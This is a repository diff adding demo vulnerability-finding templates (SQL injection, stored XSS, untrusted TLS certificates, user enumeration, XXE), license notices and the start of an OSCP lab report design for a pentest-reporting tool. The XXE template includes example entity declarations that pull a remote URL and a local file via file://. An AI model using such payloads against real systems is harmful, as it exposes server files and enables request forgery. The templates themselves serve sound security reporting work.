In some cases, SQL injection can also be used to gain code execution, allowing an attacker to gain complete control over the vulnerable server.
"""
recommendation = """
* Use prepared statements throughout the application to effectively avoid SQL injection vulnerabilities. Prepared statements are parameterized statements and ensure that even if input values are manipulated, an attacker is unable to change the original intent of an SQL statement.
* Use existing stored procedures by default where possible. Typically, stored procedures are implemented as secure parameterized queries and thus protect against SQL injections.
* Always validate all user input. Ensure that only input that is expected and valid for the application is accepted. You should not sanitize potentially malicious input.
* To reduce the potential damage of a successful SQL Injection attack, you should minimize the assigned privileges of the database user used according to the principle of least privilege.
* For detailed information and assistance on how to prevent SQL Injection vulnerabilities, see OWASP's linked SQL Injection Prevention Cheat Sheet.
"""
short_recommendation = """\
Make sure that Prepared Statements and Stored Procedures (where possible) are used throughout the application. \
This prevents the originally intended action of an SQL statement from being manipulated by an attacker.\
"""
references = [
"https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet",
]
affected_components = [
"TODO: affected component",
]

55
demo_data/demo-templates/stored_xss.toml Normal file
View File

@ -0,0 +1,55 @@
format = "templates/v2"
id = "30590c34-f04c-4817-8a1b-317c4044c540"
tags = [
"web",
]
images = []
[[translations]]
id = "a06c073d-3d04-492f-a516-e453b982b4c6"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Stored Cross-Site Scripting (XSS)"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"
summary = """
At the time of testing, the web application stored user input unchecked and later included it in HTTP responses in an insecure manner.
It was thus vulnerable to stored cross-site scripting (XSS) attacks.
Exploitation of Stored XSS vulnerabilities does not require user interaction, making them more dangerous than Reflected XSS vulnerabilities.
"""
description = """
We were able to identify a stored XSS vulnerability in the web application during testing.
Due to incorrect validation and encoding of data, we were able to inject malicious scripts into the web application and store them persistently.
**TODO: technical description**
Cross-site scripting (XSS) is a common web security vulnerability where malicious scripts can be injected into web applications due to insufficient validation or encoding of data.
In XSS attacks, attackers embed JavaScript code in the content delivered by the vulnerable web application.
The goal in stored XSS attacks is to place script code on pages visited by other users.
Simply visiting the affected subpage is enough for the script code to be executed in the victim's web browser.
For an attack, malicious scripts are injected into the web application by the attacker and stored and included in subsequent HTTP responses of the application.
The malicious script is ultimately executed in the victim's web browser and can potentially access cookies, session tokens or other sensitive information.
If the attack is successful, an attacker gains control over web application functions and data in the victim's context.
If the affected user has privileged access, an attacker may be able to gain complete control over the web application.
"""
recommendation = """
* Ensure that all processed data is filtered as rigorously as possible. Filtering and validation should be done based on expected and valid inputs.
* Data should be encoded before the web application includes it in HTTP responses. Encoding should be done contextually, that is, depending on where the web application inserts data in the HTML document, the appropriate encoding syntax must be considered.
* The HTTP headers `Content-Type` (e.g. `text/plain`) and `X-Content-Type-Options: nosniff` can be set for HTTP responses that do not contain HTML and JavaScript.
* We recommend to additionally use a Content Security Policy (CSP) to control which client-side scripts are allowed and which are forbidden.
* Detailed information and help on preventing XSS can be found in the linked Cross-Site Scripting Prevention Cheat Sheet from OWASP.
"""
short_recommendation = """\
User input should be validated and filtered based on expected or valid input. \
It should be ensured that data is properly encoded contextually before it is included in HTTP responses.\
"""
references = [
"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html",
]
affected_components = []

87
demo_data/demo-templates/untrusted_tls_certificates.toml Normal file
View File

@ -0,0 +1,87 @@
format = "templates/v2"
id = "0ebd8c6a-6386-4512-b5e5-d2d0b80f19dc"
tags = [
"infrastructure",
"external",
]
images = []
[[translations]]
id = "24604e1d-a9c0-46e0-85d3-3674e024721c"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Untrusted TLS certificates"
cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
summary = """
Communication with the application at the transport layer level was not sufficiently protected due to untrusted TLS certificates.
TLS is used by many protocols to ensure the confidentiality and integrity of communication between two endpoints.
If web browsers do not trust an application's TLS certificate, the application may be vulnerable to man-in-the-middle attacks
and thus susceptible to eavesdropping or tampering with traffic.
Insufficient protection at the transport layer may allow communications between two parties to be compromised by an untrusted third party.
An attacker could thus obtain sensitive data (e.g., credentials) if necessary.
In the event of a successful attack, an attacker could gain complete control over all functions
and data of the application by compromising a privileged user account.
"""
description = """
Transport Layer Security (TLS) is the successor to the now obsolete as well as insecure Secure Sockets Layer (SSL) protocol.
TLS is a cryptographic protocol developed for secure, encrypted communication between two or more parties.
The protocol is used in a wide variety of areas, including e-mail, instant messaging, and voice-over-IP.
The best known use of TLS is on the Web, where it ensures secure communication over HTTPS.
Primarily, TLS aims to ensure confidentiality, integrity,
but also authenticity through the use of certificates, between two or more parties.
With TLS, the establishment of a secure connection takes place in several steps.
Client and server agree on the use of TLS in the first step.
This is done either by selecting a specific port (e.g. 443 for HTTP) or by making a protocol-specific request to the server (e.g. STARTTLS for SMTP).
A handshake procedure then begins, in which the client and server negotiate various parameters for the security of the communication link.
The handshake begins with the client and server agreeing on a respective supported cipher suite, consisting of the symmetric cipher and hash function.
The server then issues a digital certificate.
The certificate contains, among other things, the server name, the issuing certificate authority (CA), and the server's data asymmetric key.
Once the client has verified the validity of the certificate, it generates a symmetric session key for the secure connection.
This is done either by the client deriving a key from a random number.
The client encrypts the random number with the server's data key and sends the result to the server.
The server can use the private key to read the result and also derive the session key.
However, the client and server could also use the Diffie-Hellman algorithm to securely agree on a random session key.
Diffie-Hellman also offers the advantage of perfect forward secrecy (PFS).
PFS prevents subsequent decryption once the server's private key is known.
Session keys are not exchanged and thus cannot be reconstructed.
The security of TLS-secured communication is based primarily on the trustworthiness of the digital certificate.
If the trustworthiness is not given, for example because the certificate has expired,
it contains an incorrect host name or it is a self-signed certificate, no secure key exchange between two endpoints can be guaranteed from the outset.
In some circumstances, the communication between two parties could be compromised by an untrusted third party in the course of a man-in-the-middle attack.
For example, an attacker could gain access to sensitive data or inject malicious data into the encrypted data stream to compromise either the client or the server.
We reviewed the TLS certificates of the applications in scope and found untrusted certificates for the following applications:
| host | expired | expiring soon | incorrect host name | incomplete certificate chain | self-signed certificate |
|:---:|:---:|:---:|:---:|:---:|:---:|
| TODO:443 | X | - | - | - | |
"""
recommendation = """
* Acquire new certificates for services that do not have trusted TLS certificates.
* Generate sufficiently strong asymmetric keys with at least 2048 bits for certificates and protect the private key.
* Use only modern cryptographic hash algorithms such as SHA-256.'
* Make sure that the certificate contains the fully qualified name of the server. The following should also be considered when creating the certificate:
* Consider whether the "www" subdomain should also be included.
* Do not include unqualified host names in the certificate.
* Do not include IP addresses.
* Do not include internal domain names.
* Create and use wildcard certificates only when there is a real need. Do not use wildcard certificates for convenience.
* Choose an appropriate certificate authority that is trusted by all major browsers. For internal applications, an internal CA can be used. However, ensure that all users have imported the internal CA certificate and thus trust certificates issued by that CA.
* Check the TLS configuration, including certificates, at regular intervals and adjust as necessary. There are a number of online tools (such as SSLabs, sslyze, etc) that you can use to quickly perform the check.
* For more information and help on TLS certificates, see the linked Transport Layer Protection Cheat Sheet from OWASP.
"""
short_recommendation = """\
Ensure that TLS certificates used are universally valid and trusted. \
Acquire new certificates for the affected services, if necessary. \
Also, follow best practices recommendations for secure TLS server configuration.\
"""
references = [
"https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html",
]
affected_components = []

50
demo_data/demo-templates/user_enumeration.toml Normal file
View File

@ -0,0 +1,50 @@
format = "templates/v2"
id = "96c40db6-d642-4e37-80f7-a48a095e3fc0"
tags = [
"web",
]
images = []
[[translations]]
id = "1359a02d-b683-48c6-952c-2f42d01ea3a8"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "User Enumeration"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
summary = """
The web application was vulnerable to a user enumeration vulnerability.
User enumeration is a common vulnerability in web applications that occurs when an attacker can use brute force techniques to determine valid user accounts in a system.
Although user enumeration is a low risk in itself, it still provides an attacker with valuable information for follow-up attacks such as in brute force and credential stuffing attacks or in social engineering campaigns.
"""
description = """
We were able to identify a user enumeration vulnerability in the web application, allowing us to determine valid user accounts using brute force techniques.
**TODO: technical description**
Often, as a result of a faulty configuration or design decision, web applications indicate when a user already exists in the system.
Two of the most common areas where this occurs are the login page or the "forgot password" feature of a web application.
One example is when a user enters incorrect credentials, they receive information that the password they entered was incorrect.
The information obtained can now be used by an attacker to determine whether or not a particular username already exists.
By trial and error, an attacker can use it to determine a list of valid usernames.
Once an attacker has such a list, they can address these user accounts in new attacks to obtain valid credentials.
In its simplest form, an attacker could perform a brute force attack.
In this, an attacker tries to guess a user account's credentials by automatically trying through passwords.
Often very large word lists containing frequently used passwords are used for this purpose.
An attacker could also use determined usernames to search past data leaks for passwords.
Credentials from data leaks, consisting of pairs of usernames and passwords, can be reused by an attacker in an automated attack.
This particular form of brute force attack, is also known as credential stuffing.
Alternatively, an attacker can use usernames in the course of social engineering campaigns to contact users directly.
"""
recommendation = """
* Ensure that the web application always returns generic error messages when invalid usernames, passwords, or other credentials are entered. Identifies all relevant attack surfaces of the application for this purpose.
* If the application defines usernames itself, user enumeration can be effectively prevented. The prerequisite for this is that user names are randomly generated so that they cannot be guessed.
* The application can also use email addresses as usernames. If the username is not yet registered, an email message will contain a unique URL that can be used to complete the registration process. If the username exists, the user receives an email message with a URL to reset the password. In either case, an attacker cannot infer valid user accounts.
* As an additional security measure, you could delete default system accounts as well as test accounts or rename them before releasing the system to production.
"""
short_recommendation = "Identify all application attack surfaces relevant to User Enumeration and ensures that the web application always returns generic error messages when invalid credentials are entered."
references = []
affected_components = []

70
demo_data/demo-templates/xxe.toml Normal file
View File

@ -0,0 +1,70 @@
format = "templates/v2"
id = "a955ef8b-b04f-4c7d-b1cc-60194bc34fe4"
tags = [
"web",
]
images = []
[[translations]]
id = "456e2ed1-c943-4721-8a78-d5a85f6b7e23"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "XML External Entity Injection (XXE)"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
summary = """
The web application processed XML documents in an insecure manner, which made it vulnerable to XML External Entity (XXE) Injection attacks.
XXE Injection is a vulnerability in web applications that allows an attacker to interfere with the processing of XML documents by an XML parser.
This attack can lead to disclosure of confidential data, denial of service, server-side request forgery, and other severe impact on the underlying system or other backend systems.
"""
description = """
We identified an XXE injection vulnerability in the web application.
The XML parser allowed the definition of XXEs, which could create a malicious XML document.
The XXE contained a URL that referenced an external domain.
After the XXE was dereferenced by the parser, the web application interacted with this domain, which is evident from the DNS requests.
**TODO: technical description**
Extensible Markup Language (XML) is a standardized markup language and file format for storing, transmitting, and reconstructing arbitrary data.
The language encodes data in a format that is readable by both humans and machines.
The structure of an XML document is defined in the XML standard.
The standard provides for a concept called an entity.
Entities provide the ability to reference content that is provided remotely by a server or resides locally on the server.
When the XML parser evaluates the XML document, the entity it contains is replaced with the referenced value.
Entities are defined in so-called Document Type Definitions (DTDs).
DTDs define the structure and composition of an XML document.
They can either be completely contained in the XML document itself, so-called internal DTDs, or they can be loaded from another location, so-called external DTDs.
A combination of both variants is also possible.
XML External Entities (XXE) are a special form of XML entities whose contents are loaded from outside the DTD in which they are declared.
An XXE is declared in the DTD with the SYSTEM keyword and a URI from where the content should be loaded.
For example:
`<!DOCTYPE dtd [ <!ENTITY xxe SYSTEM "http://syslifters.com" > ]>`
The URI can also use the `file://` protocol scheme.
Content can be loaded from local files as a result.
For example:
`<!DOCTYPE dtd [ <!ENTITY xxe SYSTEM "file:///path/to/local/file" > ]>`
When evaluating XML documents, the XML parser replaces occurring XXEs with the contents by dereferencing the defined URIs.
If the URI contains manipulated data, this could have serious consequences.
An attacker can exploit this to perform server-side request forgery (SSRF) attacks and compromise the underlying server or other backend infrastructure.
XXE injection vulnerabilities can also be exploited to cause service/application downtime (denial of service) or expose sensitive data such as local system files.
"""
recommendation = """
* The XML parser should be configured to use a local static DTD and not allow external DTDs declared in the XML document.
* We recommend limiting the functions of the XML parsing library to the minimum needed (see the documentation of the library used).
* User input should be validated before parsing if possible.
* Detailed information and help on preventing XXE injections can be found in the linked XML External Entity Prevention Cheat Sheet from OWASP.
"""
short_recommendation = "Disable support for external DTDs in the XML parsing library."
references = [
"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html",
]
affected_components = []

105
demo_data/htb-designs/NOTICE Normal file
View File

@ -0,0 +1,105 @@
This file contains licenses of components used in the HTML/Vue template source code of designs.
vue
MIT
The MIT License (MIT)
Copyright (c) 2018-present, Yuxi (Evan) You
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
chart.js
MIT
The MIT License (MIT)
Copyright (c) 2014-2022 Chart.js Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
chartjs-plugin-datalabels
MIT
The MIT License (MIT)
Copyright (c) 2017-2021 chartjs-plugin-datalabels contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
lodash
MIT
The MIT License
Copyright JS Foundation and other contributors <https://js.foundation/>
Based on Underscore.js, copyright Jeremy Ashkenas,
DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/lodash/lodash
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
Copyright and related rights for sample code are waived via CC0. Sample
code is defined as all source code displayed within the prose of the
documentation.
CC0: http://creativecommons.org/publicdomain/zero/1.0/
====
Files located in the node_modules and vendor directories are externally
maintained libraries used by this software which have their own
licenses; we recommend you read them, as their terms may differ from the
terms above.

21
demo_data/htb-designs/cbbh-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

BIN
demo_data/htb-designs/cbbh-assets/logo-transparent.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.5 KiB

1246
demo_data/htb-designs/cbbh.toml Normal file
View File

File diff suppressed because it is too large Load Diff

21
demo_data/htb-designs/cdsa-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

BIN
demo_data/htb-designs/cdsa-assets/logo-transparent.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.5 KiB

1047
demo_data/htb-designs/cdsa.toml Normal file
View File

File diff suppressed because it is too large Load Diff

21
demo_data/htb-designs/cpts-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

BIN
demo_data/htb-designs/cpts-assets/logo-transparent.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.5 KiB

1557
demo_data/htb-designs/cpts.toml Normal file
View File

File diff suppressed because it is too large Load Diff

106
demo_data/offsec-designs/NOTICE Normal file
View File

@ -0,0 +1,106 @@
This file contains licenses of components used in the HTML/Vue template source code of designs.
vue
MIT
The MIT License (MIT)
Copyright (c) 2018-present, Yuxi (Evan) You
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
chart.js
MIT
The MIT License (MIT)
Copyright (c) 2014-2022 Chart.js Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
chartjs-plugin-datalabels
MIT
The MIT License (MIT)
Copyright (c) 2017-2021 chartjs-plugin-datalabels contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
lodash
MIT
The MIT License
Copyright JS Foundation and other contributors <https://js.foundation/>
Based on Underscore.js, copyright Jeremy Ashkenas,
DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/lodash/lodash
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
Copyright and related rights for sample code are waived via CC0. Sample
code is defined as all source code displayed within the prose of the
documentation.
CC0: http://creativecommons.org/publicdomain/zero/1.0/
====
Files located in the node_modules and vendor directories are externally
maintained libraries used by this software which have their own
licenses; we recommend you read them, as their terms may differ from the
terms above.

21
demo_data/offsec-designs/oscp-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

21
demo_data/offsec-designs/oscp-lab-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

792
demo_data/offsec-designs/oscp-lab.toml Normal file
View File

@ -0,0 +1,792 @@
format = "projecttypes/v1"
id = "137ea3ee-ff86-4d8c-a6ff-56f60870979f"
name = "OSCP Lab Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"ip_address",
"cvss",
"initialaccess",
"privilegeescalation",
"postexploitation",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<section>
<h1 class="in-toc numbered">Offensive Security OSCP Lab Penetration Test Report</h1>
<div v-if="report.objective">
